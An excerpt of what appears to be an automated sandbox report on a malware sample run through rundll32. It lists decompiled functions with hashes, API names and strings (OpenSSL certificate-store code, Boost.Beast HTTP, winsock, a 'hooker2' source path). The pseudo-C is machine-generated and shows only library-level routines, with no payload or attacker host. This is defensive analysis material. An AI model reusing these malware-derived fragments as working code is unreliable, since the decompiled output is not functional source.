                                        Function 0000021EF3030FB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharMultiWide
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c
                                        • API String ID: 626452242-3997076816
                                        • Opcode ID: 104bea0762e8abe3ae5894b6eb9620281372dcb7c218e1b3971c5c4c23c0aed1
                                        • Instruction ID: 2dac5bac180d417906d18ff53f5302e47c95966d27d111d143f0d2a82ee7e820
                                        • Opcode Fuzzy Hash: 104bea0762e8abe3ae5894b6eb9620281372dcb7c218e1b3971c5c4c23c0aed1
                                        • Instruction Fuzzy Hash: F1416C7130474086FB64DF25EC087DBB3A5F768B94F41422AEE4992EA9DB3CC546CB04
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF302F590 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CertCertificateContextProperty
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c
                                        • API String ID: 665277682-3997076816
                                        • Opcode ID: 6be8e61a04173de78ca0fe913ce11004b49e7506ff8f605a30e0c00f8b1dd540
                                        • Instruction ID: a7300a585d1b9e54877e63f104c6a199eb5b62a0a61009e7ddd40703db2e817a
                                        • Opcode Fuzzy Hash: 6be8e61a04173de78ca0fe913ce11004b49e7506ff8f605a30e0c00f8b1dd540
                                        • Instruction Fuzzy Hash: 04218D7531020186FF609B65FD087EB63B1F7A9B84F824026EE0987EA5EB3DC556CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF31205A8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 49%
                                        			E0000021E21EF31205A8(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long __r8, long __r14, void* _a8, long long _a16, long long _a24) {
				long long _v0;
				long long _v40;
				void* __rdi;
				void* _t13;
				void* _t16;
				void* _t19;
				void* _t21;
				intOrPtr* _t27;
				void* _t29;
				long long _t40;
				void* _t42;
				void* _t44;
				void* _t49;
				void* _t55;
				long long _t60;

				_t60 = __r8;
				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				_t19 = r8d;
				_t13 = E0000021E21EF312C4B0(3, _t21, __rax);
				if (_t13 == 1) goto 0xf312060c;
				if (_t13 != 0) goto 0xf31205e7;
				if (E0000021E21EF312C360() == 1) goto 0xf312061b;
				r8d = _t19;
				_t29 = _a8;
				_t49 = _a24;
				_t44 = _t42;
				goto 0xf311fb98;
				r8d = _t19;
				E0000021E21EF3120430(_t29, _t49, _t44, _t44, _t49, __r14);
				asm("int3");
				r8d = _t19;
				_t40 = _t44;
				_t16 = E0000021E21EF3120430(_t29, _t49, _t40, _t44, _t49, __r14);
				asm("int3");
				asm("int3");
				asm("int3");
				_t27 = _t55 - 0x20 + 0x20;
				 *((long long*)(_t27 + 0x10)) = _t40;
				 *((long long*)(_t27 + 0x18)) = _t60;
				 *((long long*)(_t27 + 0x20)) = _v0;
				_push(_t29);
				_push(_t49);
				_push(_t44);
				E0000021E21EF301E120(_t16);
				r9d = 0;
				_v40 = _t27 + 0x18;
				return E0000021E21EF3116A00( *_t27, _t49, _t40, _v0);
			}


















                                        0x21ef31205a8
                                        0x21ef31205a8
                                        0x21ef31205ad
                                        0x21ef31205b2
                                        0x21ef31205c9
                                        0x21ef31205cf
                                        0x21ef31205d7
                                        0x21ef31205db
                                        0x21ef31205e5
                                        0x21ef31205ea
                                        0x21ef31205f3
                                        0x21ef31205fd
                                        0x21ef3120606
                                        0x21ef3120607
                                        0x21ef312060c
                                        0x21ef3120615
                                        0x21ef312061a
                                        0x21ef312061b
                                        0x21ef312061e
                                        0x21ef3120624
                                        0x21ef3120629
                                        0x21ef312062a
                                        0x21ef312062b
                                        0x21ef312062c
                                        0x21ef312062f
                                        0x21ef3120633
                                        0x21ef3120637
                                        0x21ef312063b
                                        0x21ef312063c
                                        0x21ef312063d
                                        0x21ef312064c
                                        0x21ef3120651
                                        0x21ef3120654
                                        0x21ef312066e

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _set_error_mode
                                        • String ID: Z:\hooker2\Common\md5.cpp$nLength % 4 == 0
                                        • API String ID: 1949149715-326578492
                                        • Opcode ID: 2dd39899cc4fd0f326fce0ac12fbf1610e5e71e1dfc9f846380327674395893b
                                        • Instruction ID: 01da1a1525dcb044fd32d164eccbe0b5a3d74d38a50573a6dfdbbda4defe13ac
                                        • Opcode Fuzzy Hash: 2dd39899cc4fd0f326fce0ac12fbf1610e5e71e1dfc9f846380327674395893b
                                        • Instruction Fuzzy Hash: D811E27171069081EA249B03AD495DFA7A4FBA4FC0F558526EF4807F96CA3CC852C740
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FF00B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E0000021E21EF2FF00B0(long long __rax, long long __rbx, void* __rcx) {
				long long _v8;
				long long _v16;
				long _v24;
				long _t14;
				void* _t15;
				long long _t23;
				intOrPtr _t27;
				void* _t29;

				_t23 = __rax;
				_t27 =  *((intOrPtr*)(__rcx + 0x10));
				_t2 = _t27 + 0x34;
				 *_t2 = 1;
				if ( *_t2 != 0) goto 0xf2ff0105;
				_t4 = _t27 + 0x38;
				 *_t4 = 1;
				if ( *_t4 != 0) goto 0xf2ff0105;
				r9d = 0;
				r8d = 0;
				if (PostQueuedCompletionStatus(??, ??, ??, ??) != 0) goto 0xf2ff0105;
				_v8 = __rbx;
				_t14 = GetLastError();
				_v24 = _t14;
				_t15 = E0000021E21EF310D880( *((intOrPtr*)(_t27 + 0x28)), _t29);
				_v16 = _t23;
				if (_t14 != 0) goto 0xf2ff010a;
				return _t15;
			}











                                        0x21ef2ff00b0
                                        0x21ef2ff00b4
                                        0x21ef2ff00bf
                                        0x21ef2ff00bf
                                        0x21ef2ff00c4
                                        0x21ef2ff00c6
                                        0x21ef2ff00c6
                                        0x21ef2ff00cb
                                        0x21ef2ff00d1
                                        0x21ef2ff00d4
                                        0x21ef2ff00df
                                        0x21ef2ff00e1
                                        0x21ef2ff00e6
                                        0x21ef2ff00ee
                                        0x21ef2ff00f2
                                        0x21ef2ff00f9
                                        0x21ef2ff0103
                                        0x21ef2ff0109

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CompletionErrorInit_thread_footerLastPostQueuedStatus
                                        • String ID: pqcs
                                        • API String ID: 1235608404-2559862021
                                        • Opcode ID: 1d1bc266588ec55be32d97afc5100d9174a4c41dbe7fa0ea700753218c8ec9d3
                                        • Instruction ID: adaca079b9dfcc4c7c1581e574ef29ab596245f06d682767f55082300915aa37
                                        • Opcode Fuzzy Hash: 1d1bc266588ec55be32d97afc5100d9174a4c41dbe7fa0ea700753218c8ec9d3
                                        • Instruction Fuzzy Hash: 2111D072610B0285FF518B18EC8839623B0FBA4764F564325DE9847BA8EF3CC053C744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FEFE70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID: winsock
                                        • API String ID: 724789610-334210494
                                        • Opcode ID: 70537df99092b06e4699692229b9079a3b595157778dbcd8d4209e0eeee3e64e
                                        • Instruction ID: e46d551d350e55877b307e5ed252d227de36d8393dd86290cc333cbfbf28b21e
                                        • Opcode Fuzzy Hash: 70537df99092b06e4699692229b9079a3b595157778dbcd8d4209e0eeee3e64e
                                        • Instruction Fuzzy Hash: 1121A133514B8182EE219B14FC883DBA3A1F7E5760F114325AEAA03B9ADF7CC156C780
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FEFF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Startup
                                        • String ID: winsock
                                        • API String ID: 724789610-334210494
                                        • Opcode ID: cd8b77f64586fd2a68ec8b93f49a1d5773b384db4c11cb8a7c144c2275384ded
                                        • Instruction ID: 4d64911849f6e76000fae94f815709192b09309289c2c6df25c0d6bebc9ca848
                                        • Opcode Fuzzy Hash: cd8b77f64586fd2a68ec8b93f49a1d5773b384db4c11cb8a7c144c2275384ded
                                        • Instruction Fuzzy Hash: 65219032514B8182EE219B14F8883DBA2A1F7E5760F014325AEAA03A9ADF7CC156C780
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF300F000 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E0000021E21EF300F000(intOrPtr* __rcx) {
				long long _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				long long _v56;
				signed int _t25;
				void* _t43;
				void* _t49;
				void* _t50;

				_v56 = 0xfffffffe;
				_t25 =  *(__rcx + 0x10) & 0x000000ff;
				if (_t25 != 2) goto 0xf300f049;
				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 0x10;
				if ( *((intOrPtr*)(__rcx + 8)) !=  *__rcx + 0x18) goto 0xf300f0cc;
				if ( *(__rcx + 0x10) == 0) goto 0xf300f035;
				 *(__rcx + 0x10) = 0;
				 *((long long*)(__rcx + 8)) = 0xf3204a34;
				 *(__rcx + 0x10) = 3;
				goto 0xf300f0cc;
				if (_t25 != 3) goto 0xf300f06f;
				 *((long long*)(__rcx + 8)) =  *((long long*)(__rcx + 8)) + 2;
				if ( *((intOrPtr*)(__rcx + 8)) != 0xf3204a36) goto 0xf300f0cc;
				if ( *(__rcx + 0x10) == 0) goto 0xf300f069;
				 *(__rcx + 0x10) = 0;
				 *(__rcx + 0x10) = 4;
				goto 0xf300f0cc;
				_v32 = 0xf319d200;
				_v24 = 0xf319d200;
				_v16 = 0xf319d200;
				_v48 = "invalid iterator";
				_v40 = 1;
				E0000021E21EF310E0E4(_t43,  &_v48,  &_v24, _t49, _t50);
				_v32 = 0xf319d240;
				r9d = 0xd9;
				return E0000021E21EF3010190(0xf319d240, _t43,  &_v32, "void __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,3> &)", _t49);
			}













                                        0x21ef300f004
                                        0x21ef300f00d
                                        0x21ef300f013
                                        0x21ef300f015
                                        0x21ef300f025
                                        0x21ef300f02f
                                        0x21ef300f031
                                        0x21ef300f03c
                                        0x21ef300f040
                                        0x21ef300f044
                                        0x21ef300f04b
                                        0x21ef300f04d
                                        0x21ef300f05d
                                        0x21ef300f063
                                        0x21ef300f065
                                        0x21ef300f069
                                        0x21ef300f06d
                                        0x21ef300f076
                                        0x21ef300f07d
                                        0x21ef300f082
                                        0x21ef300f08e
                                        0x21ef300f093
                                        0x21ef300f0a2
                                        0x21ef300f0af
                                        0x21ef300f0b4
                                        0x21ef300f0d0

                                        APIs
                                        Strings
                                        • invalid iterator, xrefs: 0000021EF300F087
                                        • void __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,3> &), xrefs: 0000021EF300F0BA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: invalid iterator$void __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,3> &)
                                        • API String ID: 1552479455-3017229327
                                        • Opcode ID: ad28bee9222e2d29d783d2893dfcbf6626c0514ac3cbc7f36f2c347f93da2363
                                        • Instruction ID: 643144fefc561915890e8c6b084a784d0eccaaddf645b454073b49b4073d2fc0
                                        • Opcode Fuzzy Hash: ad28bee9222e2d29d783d2893dfcbf6626c0514ac3cbc7f36f2c347f93da2363
                                        • Instruction Fuzzy Hash: AC219D72109B8085EF608718E8483CA37E1E3A5718FA58216DE9D47AE1EB7DC597C741
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3011C10 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,3> &, xrefs: 0000021EF3011C64
                                        • invalid iterator, xrefs: 0000021EF3011C34
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExceptionThrow__std_exception_copy
                                        • String ID: class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,3> &$invalid iterator
                                        • API String ID: 1552479455-487838338
                                        • Opcode ID: 81102135a62a48b02b4cb08a7679de3dbc5be90462a9374d6e47661d34dc8c28
                                        • Instruction ID: 87503ec8148e363744febb057b6d076b7359c42c33abbc6256b2b2fc793569ed
                                        • Opcode Fuzzy Hash: 81102135a62a48b02b4cb08a7679de3dbc5be90462a9374d6e47661d34dc8c28
                                        • Instruction Fuzzy Hash: 98016D32325B4495EB40DB14E98839E23A6F794390F524221EEBD47BA6EF7DC996C300
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3030650 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 24%
                                        			E0000021E21EF3030650(void* __edx, void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __rsi, void* __rbp, void* __r9, long long _a8, long long _a24, void* _a56) {
				intOrPtr _t25;
				long long _t30;
				void* _t33;
				char* _t35;

				_t33 = __rcx;
				_a8 = __rbx;
				E0000021E21EF310C220();
				if (__rdx != 0) goto 0xf3030680;
				_t25 =  *((intOrPtr*)(__rcx + 0x28));
				_t30 =  !=  ? _t25 : "MY";
				_t35 = "Opening certificate store %s\n";
				E0000021E21EF302D790(_t25, _t35, _t30, __r9);
				r9d =  *((intOrPtr*)(__rcx + 0x38));
				r8d = 0;
				_a24 = _t30;
				__imp__CertOpenStore();
				if (_t25 != 0) goto 0xf30306ea;
				if ( *0xf3209020 != 0) goto 0xf30306c3;
				 *0xf3209020 = E0000021E21EF3021CE0(_t25);
				_a24 = 0x56d;
				_t7 = _t35 + 1; // 0x6e
				r8d = _t7;
				E0000021E21EF30222D0(_t12, 0x6d,  *0xf3209020, _t25, _t25, _t33, _t35, __rsi, __rbp, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				return E0000021E21EF302DA10( *0xf3209020, _t25, _t35);
			}







                                        0x21ef3030650
                                        0x21ef3030650
                                        0x21ef303065b
                                        0x21ef303066c
                                        0x21ef303066e
                                        0x21ef303067c
                                        0x21ef3030683
                                        0x21ef303068a
                                        0x21ef303068f
                                        0x21ef3030695
                                        0x21ef3030698
                                        0x21ef30306a0
                                        0x21ef30306ac
                                        0x21ef30306b6
                                        0x21ef30306bd
                                        0x21ef30306c8
                                        0x21ef30306d9
                                        0x21ef30306d9
                                        0x21ef30306dd
                                        0x21ef30306f4

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CertOpenStore
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Opening certificate store %s
                                        • API String ID: 1485946479-1252851234
                                        • Opcode ID: 9d53cb555343fd6b92ab722da439360fa3f680574fe33003ecfe1ec5044ef8eb
                                        • Instruction ID: 95edbb04597189c23e9866dbed50b389366e7d9ca8ba49f1b51aa32099fb9d7e
                                        • Opcode Fuzzy Hash: 9d53cb555343fd6b92ab722da439360fa3f680574fe33003ecfe1ec5044ef8eb
                                        • Instruction Fuzzy Hash: 7D117C7530164086FF60DB15ED087CBB2A1BB68B84F4680269D0947F65EB2CC916CB10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF31295C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 61%
                                        			E0000021E21EF31295C0(signed int __edx, long long __rbx, intOrPtr* __rdx, intOrPtr* __r8, long long __r9, long long _a8, long long _a32) {
				intOrPtr* _t28;
				signed long long _t33;

				_a8 = __rbx;
				_a32 = __r9;
				E0000021E21EF312B41C();
				_t33 =  *((intOrPtr*)( *__r8));
				_t28 =  *((intOrPtr*)(0xf320ad20 + (_t33 >> 6) * 8));
				if (( *(_t28 + (_t33 << 6) + 0x38) & 0x00000001) == 0) goto 0xf312962a;
				E0000021E21EF312B710( *__rdx, __edx & 0x0000003f, _t28);
				if (FlushFileBuffers(??) != 0) goto 0xf3129638;
				E0000021E21EF3118964(_t28);
				 *_t28 = GetLastError();
				E0000021E21EF3118984(_t28);
				 *_t28 = 9;
				0xf312b500();
				return 0xffffffff;
			}





                                        0x21ef31295c0
                                        0x21ef31295c5
                                        0x21ef31295d7
                                        0x21ef31295e0
                                        0x21ef31295fb
                                        0x21ef3129604
                                        0x21ef3129606
                                        0x21ef3129618
                                        0x21ef312961a
                                        0x21ef3129628
                                        0x21ef312962a
                                        0x21ef312962f
                                        0x21ef312963a
                                        0x21ef312964b

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BuffersErrorFileFlushLast
                                        • String ID: nLength % 4 == 0
                                        • API String ID: 1917127615-1766050363
                                        • Opcode ID: efd6a67a954a7b5a3758ae28ac046c29ed0877c2caedd2c08a42114c46050eac
                                        • Instruction ID: e2ff3ef52f92fe8e979cfc4607af2de783c9f2f7fed8bad8227e8c28d3a9ee14
                                        • Opcode Fuzzy Hash: efd6a67a954a7b5a3758ae28ac046c29ed0877c2caedd2c08a42114c46050eac
                                        • Instruction Fuzzy Hash: C301B531700B4982EF549F65EC882DA63F1A7A9F84F458124DE594B796DE3CC455C700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FEF7D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 16%
                                        			E0000021E21EF2FEF7D0(long long __rax, long long __rbx, void* __rcx) {
				long long _v8;
				long long _v16;
				long _v24;
				long _t13;
				void* _t14;
				long long _t22;
				void* _t27;

				_t22 = __rax;
				_t1 = __rcx + 0x34;
				 *_t1 = 1;
				if ( *_t1 != 0) goto 0xf2fef821;
				_t3 = __rcx + 0x38;
				 *_t3 = 1;
				if ( *_t3 != 0) goto 0xf2fef821;
				r9d = 0;
				r8d = 0;
				if (PostQueuedCompletionStatus(??, ??, ??, ??) != 0) goto 0xf2fef821;
				_v8 = __rbx;
				_t13 = GetLastError();
				_v24 = _t13;
				_t14 = E0000021E21EF310D880( *((intOrPtr*)(__rcx + 0x28)), _t27);
				_v16 = _t22;
				if (_t13 != 0) goto 0xf2fef826;
				return _t14;
			}










                                        0x21ef2fef7d0
                                        0x21ef2fef7db
                                        0x21ef2fef7db
                                        0x21ef2fef7e0
                                        0x21ef2fef7e2
                                        0x21ef2fef7e2
                                        0x21ef2fef7e7
                                        0x21ef2fef7ed
                                        0x21ef2fef7f0
                                        0x21ef2fef7fb
                                        0x21ef2fef7fd
                                        0x21ef2fef802
                                        0x21ef2fef80a
                                        0x21ef2fef80e
                                        0x21ef2fef815
                                        0x21ef2fef81f
                                        0x21ef2fef825

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CompletionErrorInit_thread_footerLastPostQueuedStatus
                                        • String ID: pqcs
                                        • API String ID: 1235608404-2559862021
                                        • Opcode ID: fca6a54c8cb31b2c655eea5be78ba602287ab6f3eef0856d5f60807ed5bd4523
                                        • Instruction ID: f02f2d2f8bf0c76c651a2788ccae9450a8736438287baff331868d2c329ba95c
                                        • Opcode Fuzzy Hash: fca6a54c8cb31b2c655eea5be78ba602287ab6f3eef0856d5f60807ed5bd4523
                                        • Instruction Fuzzy Hash: C1F08173620E0286FF919B19AC8478623B0F7E4714F661124DE4986B55EF29C553C780
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF2FF4140 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Exception__std_exception_copy$FileHeaderRaiseThrow
                                        • String ID: could not convert calendar time to UTC time
                                        • API String ID: 3608347590-2088861013
                                        • Opcode ID: 08325126d70ff154f36be883b281417ee04c66a59bb5f007141d1d98415ad404
                                        • Instruction ID: edd560eb669de72d7373e40b37f703d999a32ae48f61caefeb0da1c903f22cee
                                        • Opcode Fuzzy Hash: 08325126d70ff154f36be883b281417ee04c66a59bb5f007141d1d98415ad404
                                        • Instruction Fuzzy Hash: CB01213221AB4195EE609B10E8443DB73B5F7A4364F815325AEAD42FA9EF2CC55AC700
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3013220 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 25%
                                        			E0000021E21EF3013220() {
				char _v32;
				char _v40;
				char _v120;
				char _v128;
				long long _v160;
				long long _v192;
				char _v200;
				char _v208;
				char _v216;
				char _v224;
				long long _v232;
				signed int _t49;
				long long _t62;
				void* _t66;
				char* _t70;
				long long _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t85;
				void* _t86;

				_t85 = _t82;
				 *((long long*)(_t85 - 0x38)) = 0xfffffffe;
				 *((long long*)(_t85 - 0x20)) = 0xf319d200;
				 *((long long*)(_t85 - 0x18)) = 0xf319d200;
				 *((long long*)(_t85 - 0x10)) = 0xf319d200;
				 *((long long*)(_t85 - 0x30)) = "invalid iterator";
				_v40 = 1;
				E0000021E21EF310E0E4(_t66, _t85 - 0x30, _t85 - 0x18, _t80, _t81);
				_v32 = 0xf319d240;
				r9d = 0xc2;
				E0000021E21EF3010190(0xf319d240, _t66,  &_v32, "class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,5> &) const", _t80);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_t86 = _t82;
				 *((long long*)(_t86 - 0x38)) = 0xfffffffe;
				 *((long long*)(_t86 - 0x20)) = 0xf319d200;
				 *((long long*)(_t86 - 0x18)) = 0xf319d200;
				 *((long long*)(_t86 - 0x10)) = 0xf319d200;
				 *((long long*)(_t86 - 0x30)) = "invalid iterator";
				_v128 = 1;
				E0000021E21EF310E0E4(_t66, _t86 - 0x30, _t86 - 0x18, _t80, _t81);
				_v120 = 0xf319d240;
				r9d = 0xc2;
				_t77 = "class boost::asio::const_buffer __cdecl boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chunk_crlf>::const_iterator::dereference(const struct std::integral_constant<unsigned __int64,5> &) const";
				_t70 =  &_v120;
				E0000021E21EF3010190(0xf319d240, _t66, _t70, _t77, _t80);
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				asm("int3");
				_v160 = _t77;
				_v232 = 0xfffffffe;
				if ( *((char*)(_t70 + 0x20)) != 6) goto 0xf3013356;
				_t62 = _t70 + 8;
				 *_t62 =  *_t62 + 2;
				if ( *_t62 != 0xf3204a36) goto 0xf30133b3;
				_t49 =  *(_t62 + 0x18) & 0x000000ff;
				if (_t49 == 0) goto 0xf3013350;
				if (_t49 != 1) goto 0xf301334c;
				_v160 = _t62;
				if ( *((char*)(_t62 + 0x10)) == 0) goto 0xf301334c;
				 *((char*)(_t62 + 0x10)) = 0;
				 *(_t62 + 0x18) = 0;
				 *(_t62 + 0x18) = 7;
				goto 0xf30133b3;
				_v208 = 0xf319d200;
				_v200 = 0xf319d200;
				_v192 = 0xf319d200;
				_v224 = "invalid iterator";
				_v216 = 1;
				E0000021E21EF310E0E4(_t66,  &_v224,  &_v200, _t80, _t81);
				_v208 = 0xf319d240;
				r9d = 0xd9;
				return E0000021E21EF3010190(0xf319d240, _t66,  &_v208, "void __cdecl boost::beast::buffers_cat_view<class boost::beast::detail::buffers_ref<class boost::beast::buffers_cat_view<class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::asio::const_buffer,class boost::beast::http::basic_fields<class std::allocator<char> >::writer::field_range,struct boost::beast::http::chunk_crlf> >,class boost::beast::http::detail::chunk_size,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf,class boost::asio::const_buffer,struct boost::beast::http::chunk_crlf>::const_iterator::increment(const struct std::integral_constant<unsigned __int64,6> &)", _t80);
			}
























                                        0x21ef3013220
                                        0x21ef3013227
                                        0x21ef3013236
                                        0x21ef301323c
                                        0x21ef3013240
                                        0x21ef301324b
                                        0x21ef301324f
                                        0x21ef301325c
                                        0x21ef3013269
                                        0x21ef301326e
                                        0x21ef3013280
                                        0x21ef3013285
                                        0x21ef3013286
                                        0x21ef3013287
                                        0x21ef3013288
                                        0x21ef3013289
                                        0x21ef301328a
                                        0x21ef301328b
                                        0x21ef301328c
                                        0x21ef301328d
                                        0x21ef301328e
                                        0x21ef301328f
                                        0x21ef3013290
                                        0x21ef3013297
